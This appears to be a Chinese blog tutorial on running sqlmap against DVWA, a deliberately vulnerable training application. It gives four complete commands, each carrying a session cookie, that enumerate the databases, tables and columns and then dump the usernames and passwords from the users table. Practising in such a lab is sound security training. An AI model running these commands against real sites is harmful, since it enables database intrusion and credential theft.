Sqlmap对dvwa进行sql注入测试
前提准备条件:
1.下载安装dvwa,下载链接地址:http://www.dvwa.co.uk/。
2.需要安装python运行环境。
3.下载sqlmap包并将其解压。
一、查看所有的数据库;(其中dbs表示显示所有数据库)
sqlmap -u "http://10.8.88.177:8089/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=impossible;PHPSESSID=paak4uv1ob93v4ptkult39b6p5" --batch --dbs
二、查看数据里的所有表:(其中-D dvwa 是选择数据库dvwa)
sqlmap -u "http://10.8.88.177:8089/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=impossible;PHPSESSID=paak4uv1ob93v4ptkult39b6p5" --batch -D dvwa --tables
三、查看表中的数据:(其中-T users 选择数据表users)
sqlmap -u "http://10.8.88.177:8089/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=impossible;PHPSESSID=paak4uv1ob93v4ptkult39b6p5" --batch -D dvwa -T users --columns
四、查看表中的user表的用户名和密码
sqlmap -u "http://10.8.88.177:8089/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=impossible;PHPSESSID=paak4uv1ob93v4ptkult39b6p5" --batch -D dvwa -T users -C "user,password" --dump
最新文章
- mysql 去重,跨表更新,跨表删除
- css 常用样式命名规则
- 设计模式 外观 Facade
- 修改SVN账户密码的方法
- CF 86D Powerful array
- POJ_3061_Subsequence_(尺取法)
- Spring Mvc Controller间跳转 重定向 传参 (转)
- centos 安装nginx
- opals 开发记录
- if...else if...else
- bootstrap3 响应式布局栅格式布局
- 201521123037 《Java程序设计》第14周学习总结
- [USACO17FEB]Why Did the Cow Cross the Road II S
- Linux安装Tomcat,运行Eclipse,web项目
- #6278. 数列分块入门 2(询问区间内小于某个值 xx 的元素个数)
- day 0313函数的初识
- 01:MongoDB基础
- 【JEECG技术文档】数据权限自定义SQL表达式用法说明
- BZOJ 3932 [CQOI2015]任务查询系统 - 差分 + 主席树
- 有符号无符号bit转换